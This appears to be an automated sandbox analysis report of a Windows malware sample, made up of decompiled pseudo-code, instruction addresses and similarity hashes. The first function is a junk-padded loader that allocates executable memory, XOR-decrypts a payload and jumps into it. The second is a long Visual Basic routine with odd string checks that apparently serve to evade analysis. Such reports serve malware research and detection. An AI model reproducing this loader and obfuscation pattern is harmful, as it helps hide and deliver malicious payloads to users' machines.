      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				asm("cld");
      				asm("cld");
      				asm("clc");
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				asm("clc"); // executed
      				VirtualAlloc(0, 0x1d000, 0x1000, 0x40); // executed
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				_t183 = E00403972(__ebx);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				_t203 = 0;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				do {
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					asm("cld");
      					asm("clc");
      					 *_t225 =  *_t225;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					asm("cld");
      					 *_t225 =  *_t225 ^ 0x00000000;
      					asm("cld");
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      					 *_t225 =  *_t225 ^ 0x00000000;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					 *(_t183 + _t203) =  *(_t183 + _t203) | (0 |  *(_t194 + _t203)) ^ 0x5d4149e9;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      					_t203 = _t203 + 4;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				} while (_t203 != 0x187bc);
      				 *_t225 =  *_t225;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				_t184 =  *_t183();
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *_t225 =  *_t225;
      				 *_t225 =  *_t225;
      				asm("cld");
      				return _t184;
      			}











      0x004036bd
      0x004036bd
      0x004036c1
      0x004036ca
      0x004036cb
      0x004036db
      0x004036de
      0x004036e1
      0x004036eb
      0x004036ef
      0x004036f9
      0x004036fd
      0x00403701
      0x00403705
      0x00403709
      0x0040370b
      0x0040370e
      0x00403711
      0x00403714
      0x0040371c
      0x00403725
      0x00403726
      0x0040372f
      0x00403733
      0x00403739
      0x0040373f
      0x00403740
      0x00403743
      0x00403746
      0x0040374a
      0x0040374e
      0x00403751
      0x00403755
      0x00403759
      0x00403759
      0x0040375d
      0x00403764
      0x00403767
      0x0040376a
      0x0040376d
      0x00403771
      0x00403777
      0x00403777
      0x0040377b
      0x0040377e
      0x00403781
      0x00403787
      0x0040378b
      0x00403795
      0x00403799
      0x004037a0
      0x004037a7
      0x004037ab
      0x004037b5
      0x004037b9
      0x004037bd
      0x004037be
      0x004037c5
      0x004037ce
      0x004037cf
      0x004037d9
      0x004037dc
      0x004037e5
      0x004037e9
      0x004037f3
      0x004037f7
      0x004037fa
      0x00403803
      0x00403807
      0x0040380b
      0x00403810
      0x00403814
      0x0040381d
      0x00403827
      0x0040382b
      0x00403835
      0x0040383c
      0x0040383d
      0x00403847
      0x00403848
      0x0040384c
      0x00403850
      0x00403855
      0x00403856
      0x0040385f
      0x00403863
      0x0040386d
      0x00403871
      0x0040387b
      0x0040387f
      0x00403889
      0x0040388d
      0x00403897
      0x0040389b
      0x0040389d
      0x0040389e
      0x004038a1
      0x004038a2
      0x004038a7
      0x004038ab
      0x004038ac
      0x004038ae
      0x004038b2
      0x004038b6
      0x004038bb
      0x004038be
      0x004038c1
      0x004038c5
      0x004038c7
      0x004038cb
      0x004038cf
      0x004038cf
      0x004038d2
      0x004038d5
      0x004038de
      0x004038e8
      0x004038ec
      0x004038f6
      0x004038fa
      0x00403901
      0x00403908
      0x0040390c
      0x00403910
      0x00403911
      0x00403918
      0x00403919
      0x0040391c
      0x00403925
      0x00403929
      0x0040392d
      0x00403930
      0x00403933
      0x00403936
      0x00403939
      0x0040393d
      0x00403941
      0x00403949
      0x0040394d
      0x00403951
      0x00403953
      0x00403954
      0x00403958
      0x0040395b
      0x00403961
      0x00403965
      0x0040396a
      0x0040396e
      0x0040396f

      APIs
      • VirtualAlloc.KERNELBASE(00000000,-000000018F68A153,-F498637D,BC1C0C4C), ref: 004038AC
      Memory Dump Source
      • Source File: 00000000.00000002.819980208.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.819975398.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.819998176.000000000041F000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.820004229.0000000000421000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: f354cad6f34d3812c2a6161681f0a14f29e09611d2fa23079f85d391daa17332
      • Instruction ID: 0d389e0dd4553bcb78a89bc41a9d2030d4517d46f30398520ca0dcfebcff0526
      • Opcode Fuzzy Hash: f354cad6f34d3812c2a6161681f0a14f29e09611d2fa23079f85d391daa17332
      • Instruction Fuzzy Hash: 0A8177B6404208ABEBC49E71C5C979E7FB0FF103A9FA66409FC8752591D7B885C98BC1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 55%
      			E0041C424(void* __ebx, void* __edi, void* __esi, signed int _a4) {
      				signed int _v8;
      				signed int _v16;
      				signed int _v20;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				short _v40;
      				void* _v44;
      				void* _v48;
      				void* _v52;
      				short _v56;
      				void* _v60;
      				void* _v64;
      				void* _v68;
      				void* _v72;
      				short _v76;
      				char _v136;
      				intOrPtr _v140;
      				void* _v144;
      				intOrPtr _v148;
      				intOrPtr _v152;
      				signed int _v156;
      				char _v160;
      				char _v164;
      				char _v168;
      				char _v172;
      				signed int _v180;
      				signed int _v188;
      				signed int _v196;
      				char _v204;
      				signed int _v212;
      				char _v220;
      				signed int _v228;
      				char _v236;
      				signed int _v244;
      				signed int _v252;
      				void* _v304;
      				char _v308;
      				intOrPtr _v312;
      				intOrPtr _v316;
      				char _v320;
      				intOrPtr _v324;
      				char _v328;
      				signed int _v332;
      				signed int _v336;
      				void* _v340;
      				signed int _v344;
      				char _v404;
      				signed int _v428;
      				signed int _v432;
      				signed int _v436;
      				intOrPtr* _v440;
      				signed int _v444;
      				signed int _v448;
      				signed int _v452;
      				intOrPtr* _v456;
      				signed int _v460;
      				signed int _v464;
      				intOrPtr* _v468;
      				signed int _v472;
      				signed int _v476;
      				intOrPtr* _v480;
      				signed int _v484;
      				signed int _v488;
      				intOrPtr* _v492;
      				signed int _v496;
      				signed int _v500;
      				intOrPtr* _v504;
      				signed int _v508;
      				signed int _v512;
      				intOrPtr* _v516;
      				signed int _v520;
      				signed int _v524;
      				intOrPtr* _v528;
      				signed int _v532;
      				signed int _v536;
      				signed int _v540;
      				void* _t466;
      				char* _t469;
      				signed int _t471;
      				signed int _t475;
      				signed int _t486;
      				char* _t488;
      				signed int _t489;
      				signed int _t496;
      				signed int* _t500;
      				char* _t503;
      				char* _t504;
      				short _t511;
      				char* _t513;
      				signed int* _t520;
      				char* _t526;
      				signed int _t544;
      				signed int _t549;
      				signed int _t556;
      				void* _t558;
      				char* _t559;
      				signed int _t562;
      				signed int _t570;
      				signed int _t575;
      				signed int _t583;
      				signed int _t588;
      				signed int _t595;
      				signed int _t600;
      				signed int _t607;
      				signed int _t612;
      				signed int _t622;
      				signed int _t627;
      				signed int _t633;
      				signed int _t638;
      				void* _t697;
      				void* _t699;
      				intOrPtr _t700;
      
      				_t700 = _t699 - 0x18;
      				 *[fs:0x0] = _t700;
      				L00401210();
      				_v28 = _t700;
      				_v24 = 0x401120;
      				_v20 = _a4 & 0x00000001;
      				_a4 = _a4 & 0xfffffffe;
      				_v16 = 0;
      				_t466 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401216, _t697);
      				_v8 = 1;
      				_v8 = 2;
      				_push(2);
      				_push(0x403060);
      				_push(0x40306c);
      				L0040138A();
      				L00401390();
      				_push(_t466);
      				_push(0x40306c);
      				_push(0);
      				L00401396();
      				_v332 =  ~(0 | _t466 != 0x00000003);
      				L00401384();
      				if(_v332 != 0) {
      					_v8 = 3;
      					_push(0xffffffff);
      					L0040137E();
      					_v8 = 4;
      					_push(0xffffffff);
      					L0040137E();
      					_v8 = 5;
      					if( *0x41f5f0 != 0) {
      						_v440 = 0x41f5f0;
      					} else {
      						_push(0x41f5f0);
      						_push(0x403090);
      						L00401378();
      						_v440 = 0x41f5f0;
      					}
      					_v332 =  *_v440;
      					_t633 =  *((intOrPtr*)( *_v332 + 0x4c))(_v332,  &_v168);
      					asm("fclex");
      					_v336 = _t633;
      					if(_v336 >= 0) {
      						_v444 = _v444 & 0x00000000;
      					} else {
      						_push(0x4c);
      						_push(0x403080);
      						_push(_v332);
      						_push(_v336);
      						L00401372();
      						_v444 = _t633;
      					}
      					_v340 = _v168;
      					_v244 = _v244 & 0x00000000;
      					_v252 = 2;
      					L00401210();
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t638 =  *((intOrPtr*)( *_v340 + 0x2c))(_v340, 0x10);
      					asm("fclex");
      					_v344 = _t638;
      					if(_v344 >= 0) {
      						_v448 = _v448 & 0x00000000;
      					} else {
      						_push(0x2c);
      						_push(0x4030a0);
      						_push(_v340);
      						_push(_v344);
      						L00401372();
      						_v448 = _t638;
      					}
      					L0040136C();
      				}
      				_v8 = 7;
      				_v180 = 0x4b;
      				_v188 = 2;
      				_push( &_v188);
      				_t469 =  &_v204;
      				_push(_t469);
      				L00401360();
      				_push(0x4030b4);
      				_push(0x4030bc);
      				L0040138A();
      				_v212 = _t469;
      				_v220 = 0x8008;
      				_push( &_v204);
      				_t471 =  &_v220;
      				_push(_t471);
      				L00401366();
      				_v332 = _t471;
      				_push( &_v220);
      				_push( &_v204);
      				_push( &_v188);
      				_push(3);
      				L0040135A();
      				_t475 = _v332;
      				if(_t475 != 0) {
      					_v8 = 8;
      					L00401354();
      					_v8 = 9;
      					L0040134E();
      					L00401390();
      					_v8 = 0xa;
      					L00401342();
      					_t489 =  &_v168;
      					L00401348();
      					_v332 = _t489;
      					_v228 = 0x80020004;
      					_v236 = 0xa;
      					_v212 = 0x80020004;
      					_v220 = 0xa;
      					_v196 = 0x80020004;
      					_v204 = 0xa;
      					_v180 = 0x80020004;
      					_v188 = 0xa;
      					_t496 =  *((intOrPtr*)( *_v332 + 0x44))(_v332, 0x291f,  &_v188,  &_v204,  &_v220,  &_v236, _t489, _t475);
      					asm("fclex");
      					_v336 = _t496;
      					if(_v336 >= 0) {
      						_v452 = _v452 & 0x00000000;
      					} else {
      						_push(0x44);
      						_push(0x4030c0);
      						_push(_v332);
      						_push(_v336);
      						L00401372();
      						_v452 = _t496;
      					}
      					L0040136C();
      					_push( &_v236);
      					_push( &_v220);
      					_push( &_v204);
      					_t500 =  &_v188;
      					_push(_t500);
      					_push(4);
      					L0040135A();
      					_v8 = 0xb;
      					_v308 = 0x6317b;
      					L00401336();
      					_push(_t500);
      					_push( &_v160);
      					L0040133C();
      					_push( &_v308);
      					_push(0x297142);
      					_push(L"ANDREWARTHA");
      					_t503 =  &_v164;
      					_push(_t503);
      					L0040133C();
      					_push(_t503);
      					_t504 =  &_v160;
      					_push(_t504);
      					E00402F20();
      					_v312 = _t504;
      					L00401330();
      					_v332 =  ~(0 | _v312 == 0x001b827e);
      					_push( &_v164);
      					_push( &_v160);
      					_push( &_v156);
      					_push(3);
      					L0040132A();
      					_t511 = _v332;
      					if(_t511 != 0) {
      						_v8 = 0xc;
      						_push(0x403114);
      						_push("4:4");
      						L0040138A();
      						L00401390();
      						_push(_t511);
      						_push( &_v188);
      						L0040131E();
      						_push( &_v188);
      						L00401324();
      						L00401390();
      						L00401384();
      						L00401318();
      						_v8 = 0xd;
      						_v180 = 1;
      						_v188 = 2;
      						_push(0xfffffffe);
      						_push(0xfffffffe);
      						_push(0xfffffffe);
      						_push(0xffffffff);
      						_push( &_v188);
      						L00401312();
      						L00401390();
      						L00401318();
      						_v8 = 0xe;
      						_v8 = 0xf;
      						if( *0x41f5f0 != 0) {
      							_v456 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v456 = 0x41f5f0;
      						}
      						_v332 =  *_v456;
      						_t622 =  *((intOrPtr*)( *_v332 + 0x1c))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t622;
      						if(_v336 >= 0) {
      							_v460 = _v460 & 0x00000000;
      						} else {
      							_push(0x1c);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v460 = _t622;
      						}
      						_v340 = _v168;
      						_t627 =  *((intOrPtr*)( *_v340 + 0x64))(_v340, 1,  &_v304);
      						asm("fclex");
      						_v344 = _t627;
      						if(_v344 >= 0) {
      							_v464 = _v464 & 0x00000000;
      						} else {
      							_push(0x64);
      							_push(0x403128);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v464 = _t627;
      						}
      						_t511 = _v304;
      						_v56 = _t511;
      						L0040136C();
      					}
      					_v8 = 0x11;
      					L00401336();
      					_push(_t511);
      					_push( &_v160);
      					L0040133C();
      					_t513 =  &_v160;
      					_push(_t513);
      					_push(0x83bcf2);
      					_push(0x2ea394);
      					_push(0x59ae9b);
      					_push(0x4f0673);
      					E00402F74();
      					_v308 = _t513;
      					L00401330();
      					_v332 =  ~(0 | _v308 == 0x0066f1e8);
      					_push( &_v160);
      					_push( &_v156);
      					_push(2);
      					L0040132A();
      					if(_v332 != 0) {
      						_v8 = 0x12;
      						if( *0x41f5f0 != 0) {
      							_v468 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v468 = 0x41f5f0;
      						}
      						_v332 =  *_v468;
      						_t595 =  *((intOrPtr*)( *_v332 + 0x14))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t595;
      						if(_v336 >= 0) {
      							_v472 = _v472 & 0x00000000;
      						} else {
      							_push(0x14);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v472 = _t595;
      						}
      						_v340 = _v168;
      						_t600 =  *((intOrPtr*)( *_v340 + 0x60))(_v340,  &_v156);
      						asm("fclex");
      						_v344 = _t600;
      						if(_v344 >= 0) {
      							_v476 = _v476 & 0x00000000;
      						} else {
      							_push(0x60);
      							_push(0x403150);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v476 = _t600;
      						}
      						_v428 = _v156;
      						_v156 = _v156 & 0x00000000;
      						L00401390();
      						L0040136C();
      						_v8 = 0x13;
      						if( *0x41f5f0 != 0) {
      							_v480 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v480 = 0x41f5f0;
      						}
      						_v332 =  *_v480;
      						_t607 =  *((intOrPtr*)( *_v332 + 0x14))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t607;
      						if(_v336 >= 0) {
      							_v484 = _v484 & 0x00000000;
      						} else {
      							_push(0x14);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v484 = _t607;
      						}
      						_v340 = _v168;
      						_t612 =  *((intOrPtr*)( *_v340 + 0x140))(_v340,  &_v304);
      						asm("fclex");
      						_v344 = _t612;
      						if(_v344 >= 0) {
      							_v488 = _v488 & 0x00000000;
      						} else {
      							_push(0x140);
      							_push(0x403150);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v488 = _t612;
      						}
      						_v76 = _v304;
      						L0040136C();
      						_v8 = 0x14;
      						L0040130C();
      					}
      					_v8 = 0x16;
      					_push(L"Contangoes3");
      					_t520 =  &_v156;
      					_push(_t520);
      					L0040133C();
      					_push(_t520);
      					E00402FD0();
      					_v308 = _t520;
      					L00401330();
      					_v332 =  ~(0 | _v308 == 0x003c82f5);
      					L00401384();
      					if(_v332 != 0) {
      						_v8 = 0x17;
      						if( *0x41f5f0 != 0) {
      							_v492 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v492 = 0x41f5f0;
      						}
      						_v332 =  *_v492;
      						_t570 =  *((intOrPtr*)( *_v332 + 0x14))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t570;
      						if(_v336 >= 0) {
      							_v496 = _v496 & 0x00000000;
      						} else {
      							_push(0x14);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v496 = _t570;
      						}
      						_v340 = _v168;
      						_t575 =  *((intOrPtr*)( *_v340 + 0x130))(_v340,  &_v156);
      						asm("fclex");
      						_v344 = _t575;
      						if(_v344 >= 0) {
      							_v500 = _v500 & 0x00000000;
      						} else {
      							_push(0x130);
      							_push(0x403150);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v500 = _t575;
      						}
      						_v432 = _v156;
      						_v156 = _v156 & 0x00000000;
      						L00401390();
      						L0040136C();
      						_v8 = 0x18;
      						_v180 = 2;
      						_v188 = 2;
      						_push( &_v188);
      						L00401306();
      						L00401390();
      						L00401318();
      						_v8 = 0x19;
      						_v8 = 0x1a;
      						if( *0x41f5f0 != 0) {
      							_v504 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v504 = 0x41f5f0;
      						}
      						_v332 =  *_v504;
      						_t583 =  *((intOrPtr*)( *_v332 + 0x4c))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t583;
      						if(_v336 >= 0) {
      							_v508 = _v508 & 0x00000000;
      						} else {
      							_push(0x4c);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v508 = _t583;
      						}
      						_v340 = _v168;
      						_t588 =  *((intOrPtr*)( *_v340 + 0x24))(_v340, L"iliau", L"Lstes8",  &_v156);
      						asm("fclex");
      						_v344 = _t588;
      						if(_v344 >= 0) {
      							_v512 = _v512 & 0x00000000;
      						} else {
      							_push(0x24);
      							_push(0x4030a0);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v512 = _t588;
      						}
      						_v436 = _v156;
      						_v156 = _v156 & 0x00000000;
      						L00401390();
      						L0040136C();
      					}
      					_v8 = 0x1c;
      					_push( &_v136);
      					_t526 =  &_v404;
      					_push(_t526);
      					_push(0x402e70);
      					L00401300();
      					_push(_t526);
      					E0040302C();
      					_v308 = _t526;
      					L00401330();
      					_push( &_v404);
      					_push( &_v136);
      					_push(0x402e70);
      					L004012FA();
      					_v332 =  ~(0 | _v308 == 0x0028d15d);
      					_push( &_v404);
      					_push(0x402e70);
      					L004012F4();
      					if(_v332 != 0) {
      						_v8 = 0x1d;
      						_v180 = 2;
      						_v188 = 2;
      						_push( &_v188);
      						_push( &_v204);
      						L004012EE();
      						_push( &_v204);
      						L00401324();
      						L00401390();
      						_push( &_v204);
      						_push( &_v188);
      						_push(2);
      						L0040135A();
      						_v8 = 0x1e;
      						if( *0x41f5f0 != 0) {
      							_v516 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v516 = 0x41f5f0;
      						}
      						_v332 =  *_v516;
      						_t544 =  *((intOrPtr*)( *_v332 + 0x14))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t544;
      						if(_v336 >= 0) {
      							_v520 = _v520 & 0x00000000;
      						} else {
      							_push(0x14);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v520 = _t544;
      						}
      						_v340 = _v168;
      						_t549 =  *((intOrPtr*)( *_v340 + 0x78))(_v340,  &_v304);
      						asm("fclex");
      						_v344 = _t549;
      						if(_v344 >= 0) {
      							_v524 = _v524 & 0x00000000;
      						} else {
      							_push(0x78);
      							_push(0x403150);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v524 = _t549;
      						}
      						_v40 = _v304;
      						L0040136C();
      						_v8 = 0x1f;
      						_v8 = 0x20;
      						if( *0x41f5f0 != 0) {
      							_v528 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v528 = 0x41f5f0;
      						}
      						_v332 =  *_v528;
      						_t556 =  *((intOrPtr*)( *_v332 + 0x1c))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t556;
      						if(_v336 >= 0) {
      							_v532 = _v532 & 0x00000000;
      						} else {
      							_push(0x1c);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v532 = _t556;
      						}
      						_v340 = _v168;
      						_v244 = 1;
      						_v252 = 2;
      						_t558 = 0x10;
      						L00401210();
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						L004012E8();
      						_t559 =  &_v172;
      						L00401348();
      						_t562 =  *((intOrPtr*)( *_v340 + 0x58))(_v340, _t559, _t559, _t558, _v140, 0x4031a0);
      						asm("fclex");
      						_v344 = _t562;
      						if(_v344 >= 0) {
      							_v536 = _v536 & 0x00000000;
      						} else {
      							_push(0x58);
      							_push(0x403128);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v536 = _t562;
      						}
      						_push( &_v168);
      						_push( &_v172);
      						_push(2);
      						L004012E2();
      					}
      				}
      				_v8 = 0x23;
      				_v320 = 0x1ee95e40;
      				_v316 = 0x5b03;
      				 *((intOrPtr*)( *_a4 + 0x700))(_a4, L"stretchier",  &_v320, 0x2277,  &_v328);
      				_v152 = _v328;
      				_v148 = _v324;
      				_v8 = 0x24;
      				_t486 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v188);
      				_v332 = _t486;
      				if(_v332 >= 0) {
      					_v540 = _v540 & 0x00000000;
      				} else {
      					_push(0x6f8);
      					_push(0x402da0);
      					_push(_a4);
      					_push(_v332);
      					L00401372();
      					_v540 = _t486;
      				}
      				L00401318();
      				_v20 = 0;
      				_push(0x41d490);
      				_push( &_v404);
      				_push(0x402e70);
      				L004012F4();
      				L00401384();
      				L00401384();
      				L00401384();
      				L00401384();
      				L00401384();
      				L00401384();
      				L00401384();
      				_t488 =  &_v136;
      				_push(_t488);
      				_push(0x402e70);
      				L004012DC();
      				L0040136C();
      				L00401384();
      				return _t488;
      			}



















































































































      0x0041c427
      0x0041c436
      0x0041c442
      0x0041c44a
      0x0041c44d
      0x0041c45a
      0x0041c463
      0x0041c466
      0x0041c475
      0x0041c478
      0x0041c47f
      0x0041c486
      0x0041c488
      0x0041c48d
      0x0041c492
      0x0041c49f
      0x0041c4a4
      0x0041c4a5
      0x0041c4aa
      0x0041c4ac
      0x0041c4bb
      0x0041c4c8
      0x0041c4d6
      0x0041c4dc
      0x0041c4e3
      0x0041c4e5
      0x0041c4ea
      0x0041c4f1
      0x0041c4f3
      0x0041c4f8
      0x0041c506
      0x0041c523
      0x0041c508
      0x0041c508
      0x0041c50d
      0x0041c512
      0x0041c517
      0x0041c517
      0x0041c535
      0x0041c550
      0x0041c553
      0x0041c555
      0x0041c562
      0x0041c584
      0x0041c564
      0x0041c564
      0x0041c566
      0x0041c56b
      0x0041c571
      0x0041c577
      0x0041c57c
      0x0041c57c
      0x0041c591
      0x0041c597
      0x0041c59e
      0x0041c5ab
      0x0041c5b8
      0x0041c5b9
      0x0041c5ba
      0x0041c5bb
      0x0041c5ca
      0x0041c5cd
      0x0041c5cf
      0x0041c5dc
      0x0041c5fe
      0x0041c5de
      0x0041c5de
      0x0041c5e0
      0x0041c5e5
      0x0041c5eb
      0x0041c5f1
      0x0041c5f6
      0x0041c5f6
      0x0041c60b
      0x0041c60b
      0x0041c610
      0x0041c617
      0x0041c621
      0x0041c631
      0x0041c632
      0x0041c638
      0x0041c639
      0x0041c63e
      0x0041c643
      0x0041c648
      0x0041c64d
      0x0041c653
      0x0041c663
      0x0041c664
      0x0041c66a
      0x0041c66b
      0x0041c670
      0x0041c67d
      0x0041c684
      0x0041c68b
      0x0041c68c
      0x0041c68e
      0x0041c696
      0x0041c69f
      0x0041c6a5
      0x0041c6ac
      0x0041c6b1
      0x0041c6b8
      0x0041c6c2
      0x0041c6c7
      0x0041c6ce
      0x0041c6d4
      0x0041c6db
      0x0041c6e0
      0x0041c6e6
      0x0041c6f0
      0x0041c6fa
      0x0041c704
      0x0041c70e
      0x0041c718
      0x0041c722
      0x0041c72c
      0x0041c765
      0x0041c768
      0x0041c76a
      0x0041c777
      0x0041c799
      0x0041c779
      0x0041c779
      0x0041c77b
      0x0041c780
      0x0041c786
      0x0041c78c
      0x0041c791
      0x0041c791
      0x0041c7a6
      0x0041c7b1
      0x0041c7b8
      0x0041c7bf
      0x0041c7c0
      0x0041c7c6
      0x0041c7c7
      0x0041c7c9
      0x0041c7d1
      0x0041c7d8
      0x0041c7ed
      0x0041c7f2
      0x0041c7f9
      0x0041c7fa
      0x0041c805
      0x0041c806
      0x0041c80b
      0x0041c810
      0x0041c816
      0x0041c817
      0x0041c81c
      0x0041c81d
      0x0041c823
      0x0041c824
      0x0041c829
      0x0041c82f
      0x0041c845
      0x0041c852
      0x0041c859
      0x0041c860
      0x0041c861
      0x0041c863
      0x0041c86b
      0x0041c874
      0x0041c87a
      0x0041c881
      0x0041c886
      0x0041c88b
      0x0041c898
      0x0041c89d
      0x0041c8a4
      0x0041c8a5
      0x0041c8b0
      0x0041c8b1
      0x0041c8be
      0x0041c8c9
      0x0041c8d4
      0x0041c8d9
      0x0041c8e0
      0x0041c8ea
      0x0041c8f4
      0x0041c8f6
      0x0041c8f8
      0x0041c8fa
      0x0041c902
      0x0041c903
      0x0041c90d
      0x0041c918
      0x0041c91d
      0x0041c924
      0x0041c932
      0x0041c94f
      0x0041c934
      0x0041c934
      0x0041c939
      0x0041c93e
      0x0041c943
      0x0041c943
      0x0041c961
      0x0041c97c
      0x0041c97f
      0x0041c981
      0x0041c98e
      0x0041c9b0
      0x0041c990
      0x0041c990
      0x0041c992
      0x0041c997
      0x0041c99d
      0x0041c9a3
      0x0041c9a8
      0x0041c9a8
      0x0041c9bd
      0x0041c9da
      0x0041c9dd
      0x0041c9df
      0x0041c9ec
      0x0041ca0e
      0x0041c9ee
      0x0041c9ee
      0x0041c9f0
      0x0041c9f5
      0x0041c9fb
      0x0041ca01
      0x0041ca06
      0x0041ca06
      0x0041ca15
      0x0041ca1c
      0x0041ca26
      0x0041ca26
      0x0041ca2b
      0x0041ca3d
      0x0041ca42
      0x0041ca49
      0x0041ca4a
      0x0041ca4f
      0x0041ca55
      0x0041ca56
      0x0041ca5b
      0x0041ca60
      0x0041ca65
      0x0041ca6a
      0x0041ca6f
      0x0041ca75
      0x0041ca8b
      0x0041ca98
      0x0041ca9f
      0x0041caa0
      0x0041caa2
      0x0041cab3
      0x0041cab9
      0x0041cac7
      0x0041cae4
      0x0041cac9
      0x0041cac9
      0x0041cace
      0x0041cad3
      0x0041cad8
      0x0041cad8
      0x0041caf6
      0x0041cb11
      0x0041cb14
      0x0041cb16
      0x0041cb23
      0x0041cb45
      0x0041cb25
      0x0041cb25
      0x0041cb27
      0x0041cb2c
      0x0041cb32
      0x0041cb38
      0x0041cb3d
      0x0041cb3d
      0x0041cb52
      0x0041cb6d
      0x0041cb70
      0x0041cb72
      0x0041cb7f
      0x0041cba1
      0x0041cb81
      0x0041cb81
      0x0041cb83
      0x0041cb88
      0x0041cb8e
      0x0041cb94
      0x0041cb99
      0x0041cb99
      0x0041cbae
      0x0041cbb4
      0x0041cbc4
      0x0041cbcf
      0x0041cbd4
      0x0041cbe2
      0x0041cbff
      0x0041cbe4
      0x0041cbe4
      0x0041cbe9
      0x0041cbee
      0x0041cbf3
      0x0041cbf3
      0x0041cc11
      0x0041cc2c
      0x0041cc2f
      0x0041cc31
      0x0041cc3e
      0x0041cc60
      0x0041cc40
      0x0041cc40
      0x0041cc42
      0x0041cc47
      0x0041cc4d
      0x0041cc53
      0x0041cc58
      0x0041cc58
      0x0041cc6d
      0x0041cc88
      0x0041cc8e
      0x0041cc90
      0x0041cc9d
      0x0041ccc2
      0x0041cc9f
      0x0041cc9f
      0x0041cca4
      0x0041cca9
      0x0041ccaf
      0x0041ccb5
      0x0041ccba
      0x0041ccba
      0x0041ccd0
      0x0041ccda
      0x0041ccdf
      0x0041cce6
      0x0041cce6
      0x0041cceb
      0x0041ccf2
      0x0041ccf7
      0x0041ccfd
      0x0041ccfe
      0x0041cd03
